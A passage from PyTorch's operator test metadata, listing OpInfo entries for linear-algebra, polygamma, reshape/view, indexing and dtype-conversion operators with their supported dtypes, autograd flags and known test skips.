aten_name='linalg_svd', dtypes=floating_and_complex_types(), supports_fwgrad_bwgrad=True, supports_forward_ad=True, check_batched_forward_grad=False, # We're using at::allclose, which does not have a batching rule check_batched_grad=False, check_batched_gradgrad=False, sample_inputs_func=sample_inputs_svd, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], skips=( # FIXME forward over backward gives a numerical error DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=(torch.complex128,)), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.svdvals', op=torch.linalg.svdvals, aten_name='linalg_svdvals', dtypes=floating_and_complex_types(), check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, supports_forward_ad=True, # We're using at::allclose, which does not have a batching rule check_batched_gradgrad=False, sample_inputs_func=sample_inputs_linalg_svdvals, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off]), OpInfo('svd_lowrank', op=lambda *args, **kwargs: wrapper_set_seed( lambda a, b, **kwargs: torch.svd_lowrank(a @ b.mT, **kwargs), *args, **kwargs ), dtypes=floating_types(), supports_out=False, check_batched_grad=False, check_batched_gradgrad=False, check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, supports_forward_ad=True, sample_inputs_func=sample_inputs_svd_lowrank, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off, DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-03, rtol=1e-03)}), 'TestCommon', 'test_noncontiguous_samples', device_type='cuda')], skips=( # test does not work with passing lambda for op DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('pca_lowrank', op=lambda *args, **kwargs: wrapper_set_seed( lambda a, b, **kwargs: torch.pca_lowrank(a @ b.mT, **kwargs), *args, **kwargs ), dtypes=floating_types(), supports_out=False, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_pca_lowrank, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off, DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-03, rtol=1e-03)}), 'TestCommon', 'test_noncontiguous_samples', device_type='cuda')], skips=( # test does not work with passing lambda for op DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), BinaryUfuncInfo('polar', dtypes=floating_types(), # this function is undefined if 'abs' values are <0 supports_forward_ad=True, lhs_make_tensor_kwargs=dict(low=0), supports_rhs_python_scalar=False, skips=( # RuntimeError: Expected object of scalar type Float but got scalar type Double for second argument DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs', 'test_type_promotion'), # GradcheckError: Jacobian computed with forward mode mismatch for output 0 with respect to input 0 
# Numerical: # tensor([[0.]], dtype=torch.float64) # Analytical: # tensor([[-0.0047]], dtype=torch.float64, grad_fn=<CopySlices>) DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad'), )), # TODO(@kshitij12345): Refactor similar to `mvlgamma` entries. # To test reference numerics against multiple values of argument `n`, # we make multiple OpInfo entries with each entry corresponding to different value of n (currently 0 to 4). # We run the op tests from test_ops.py only for `n=0` to avoid redundancy in testing. UnaryUfuncInfo('polygamma', op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs), variant_test_name='polygamma_n_0', ref=reference_polygamma if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_polygamma, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), ), sample_kwargs=lambda device, dtype, input: ({'n': 0}, {'n': 0})), # A separate OpInfo entry for special.polygamma is needed to reorder the arguments # for the alias. See the discussion here: https://github.com/pytorch/pytorch/pull/59691#discussion_r650261939 UnaryUfuncInfo('special.polygamma', op=lambda x, n, **kwargs: torch.special.polygamma(n, x, **kwargs), variant_test_name='special_polygamma_n_0', ref=reference_polygamma if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_polygamma, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), ), sample_kwargs=lambda device, dtype, input: ({'n': 0}, {'n': 0}), # polygamma functions have multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), UnaryUfuncInfo('polygamma', op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs), variant_test_name='polygamma_n_1', ref=reference_polygamma if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_polygamma, skips=( # Redundant tests DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), # Mismatch: https://github.com/pytorch/pytorch/issues/55357 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large'), ), sample_kwargs=lambda device, dtype, input: ({'n': 1}, {'n': 1}), # polygamma functions have multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), UnaryUfuncInfo('polygamma', op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs), variant_test_name='polygamma_n_2', ref=reference_polygamma if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, 
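# As in the other polygamma_n_* entries, sample_kwargs below appears to return
# a pair of kwarg dicts, one forwarded to the torch op and one to the reference
# function, so ({'n': 2}, {'n': 2}) exercises torch.polygamma(2, x) against
# (roughly) scipy.special.polygamma(2, x); reference_numerics_filter then
# replaces inputs near the singularities at x = 0, -1, -2, ... with a safe
# value (here anything below 0.1 becomes 1) before the comparison.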
sample_inputs_func=sample_inputs_polygamma, skips=( # Redundant tests DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), # Mismatch: https://github.com/pytorch/pytorch/issues/55357 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', active_if=TEST_WITH_ROCM), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', active_if=TEST_WITH_ROCM),), sample_kwargs=lambda device, dtype, input: ({'n': 2}, {'n': 2}), # polygamma functions have multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), UnaryUfuncInfo('polygamma', op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs), variant_test_name='polygamma_n_3', ref=reference_polygamma if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_polygamma, skips=( # Redundant tests DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), # Mismatch: https://github.com/pytorch/pytorch/issues/55357 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'),), sample_kwargs=lambda device, dtype, input: ({'n': 3}, {'n': 3}), # polygamma functions have multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), UnaryUfuncInfo('polygamma', op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs), variant_test_name='polygamma_n_4', ref=reference_polygamma if TEST_SCIPY else _NOTHING, decorators=(precisionOverride({torch.float16: 5e-4, torch.float32: 5e-4}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_polygamma, skips=( # Redundant tests DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), # Mismatch: https://github.com/pytorch/pytorch/issues/55357 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', active_if=TEST_WITH_ROCM), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', active_if=TEST_WITH_ROCM),), sample_kwargs=lambda device, dtype, input: ({'n': 4}, {'n': 4}), # polygamma functions have multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), OpInfo('ravel', ref=np.ravel, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_ravel, ), OpInfo('reshape', dtypes=all_types_and_complex_and(torch.bool, torch.float16, 
torch.bfloat16, torch.chalf), sample_inputs_func=partial(sample_inputs_view_reshape, transpose_samples=True), reference_inputs_func=partial(reference_inputs_view_reshape, transpose_samples=True), error_inputs_func=error_inputs_reshape, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('reshape_as', op=lambda x, other: x.reshape_as(other), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_view_as_reshape_as, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), )), OpInfo('view', op=lambda x, shape: x.view(shape), dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_jit_shape_analysis=True, sample_inputs_func=partial(sample_inputs_view_reshape, transpose_samples=False), reference_inputs_func=partial(reference_inputs_view_reshape, transpose_samples=False), skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), )), OpInfo('view_as', op=lambda x, other: x.view_as(other), dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_view_as_reshape_as, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), )), OpInfo('atleast_1d', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_atleast1d2d3d, skips=( # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. 
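# A hedged illustration of the variadic call that scripting cannot express
# (hypothetical values): torch.atleast_1d(torch.tensor(1.), torch.tensor(2.))
# returns one 1-D tensor per input, while torch.atleast_1d(torch.tensor(1.))
# returns a single 1-D tensor.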
DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), ), ), OpInfo('atleast_2d', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), ), sample_inputs_func=sample_inputs_atleast1d2d3d, ), OpInfo('atleast_3d', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), ), sample_inputs_func=sample_inputs_atleast1d2d3d, ), OpInfo('flatten', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_flatten, reference_inputs_func=reference_inputs_flatten, ), OpInfo('column_stack', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"),), sample_inputs_func=sample_inputs_column_stack,), OpInfo('pinverse', op=torch.pinverse, dtypes=floating_and_complex_types(), check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_out=False, sample_inputs_func=sample_inputs_linalg_invertible, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('gather', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_gather, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_forward_ad=True, supports_fwgrad_bwgrad=True, error_inputs_func=error_inputs_gather, ), OpInfo('index_fill', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_index), OpInfo('index_copy', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( ), sample_inputs_func=sample_inputs_index, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('index_select', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_index, 
error_inputs_func=error_inputs_index_select, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_jit_shape_analysis=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('index_add', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_index, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('index_reduce', dtypes=floating_types_and(torch.float16, torch.bfloat16), supports_out=True, sample_inputs_func=sample_inputs_index_reduce), OpInfo('__getitem__', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_inplace_autograd=False, supports_scripting=False, op=torch.Tensor.__getitem__, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: False is not true : Scalars failed to compare as equal! 0 != 104448 DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='cuda'),), sample_inputs_func=sample_inputs_getitem), OpInfo('index_put', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_inplace_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, test_neg_view=False, sample_inputs_func=sample_inputs_index_put, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: The following operation failed in the TorchScript interpreter. # Traceback of TorchScript (most recent call last): # File "<string>", line 3, in forward # def the_method(i0, i1: List[torch.Tensor], i2): # return torch.index_put(i0, i1, i2, accumulate=False) # ~~~~~~~~~~~~~~~ <--- HERE # RuntimeError: a leaf Variable that requires grad is being used in an in-place operation. 
DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('sort', dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_sort, supports_forward_ad=True, supports_fwgrad_bwgrad=True), OpInfo('unique', dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.float16), sample_inputs_func=sample_inputs_unique, supports_out=False, supports_autograd=False, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # 76571 DecorateInfo(unittest.expectedFailure, 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values', dtypes=(torch.float16, torch.float32, torch.float64)), )), OpInfo('unique_consecutive', dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.float16), sample_inputs_func=sample_inputs_unique_consecutive, supports_out=False, supports_autograd=False, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # 76571 DecorateInfo(unittest.expectedFailure, 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values', dtypes=(torch.float16, torch.float32, torch.float64)), )), OpInfo('put', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, check_batched_gradgrad=False, # vmap complains of the sizes skips=( # Problem, needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ), sample_inputs_func=sample_inputs_put), OpInfo('take', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), check_batched_grad=False, # vmap complains of the sizes supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_take, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), ), error_inputs_func=error_inputs_take), OpInfo('scatter', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_scatter, error_inputs_func=error_inputs_scatter_and_scatter_add), OpInfo('bfloat16', op=lambda x, *args, **kwargs: x.bfloat16(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, skips=( # autograd tests don't handle operators that change dtype DecorateInfo(unittest.expectedFailure, 'TestGradients'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), )), OpInfo('bool', op=lambda x, *args, **kwargs: x.bool(*args, 
**kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # 76047 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.int8,)), )), OpInfo('byte', op=lambda x, *args, **kwargs: x.byte(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_conversion, # The autograd test runner cannot handle functions that change dtype supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('char', op=lambda x, *args, **kwargs: x.char(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, # The autograd test runner cannot handle functions that change dtype supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('double', op=lambda x, *args, **kwargs: x.double(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('float', op=lambda x, *args, **kwargs: x.float(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, skips=( # autograd tests don't handle operators that change dtype DecorateInfo(unittest.expectedFailure, 'TestGradients'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('half', op=lambda x, *args, **kwargs: x.half(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=True, skips=( # autograd tests don't handle operators that change dtype DecorateInfo(unittest.expectedFailure, 'TestGradients'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('int', op=lambda x, *args, **kwargs: x.int(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, 
torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('long', op=lambda x, *args, **kwargs: x.long(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('short', op=lambda x, *args, **kwargs: x.short(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('chalf', op=lambda x, *args, **kwargs: x.chalf(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, skips=( # autograd tests don't handle operators that change dtype DecorateInfo(unittest.expectedFailure, 'TestGradients'), # use of lambda doesn't work with test_normalize_operator_exhaustive DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: "index_select" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_noncontiguous_samples', dtypes=(torch.float, torch.cfloat)), # RuntimeError: "sum_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_variant_consistency_eager', device_type='cpu'), # TypeError: 'int' object is not iterable DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # RuntimeError: "sum_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view', device_type='cpu'), # RuntimeError: "sum_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view', device_type='cpu'), # RuntimeError: "sum_cpu" not implemented for 'ComplexHalf' # RuntimeError: "neg_conj_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), ) ), OpInfo('empty_like', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_like_fns, reference_inputs_func=reference_inputs_like_fns, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_noncontiguous_samples'), # Empty tensor data is garbage so it's hard to make comparisons with it. 
DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_complex_half_reference_testing'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('zeros_like', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_like_fns, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 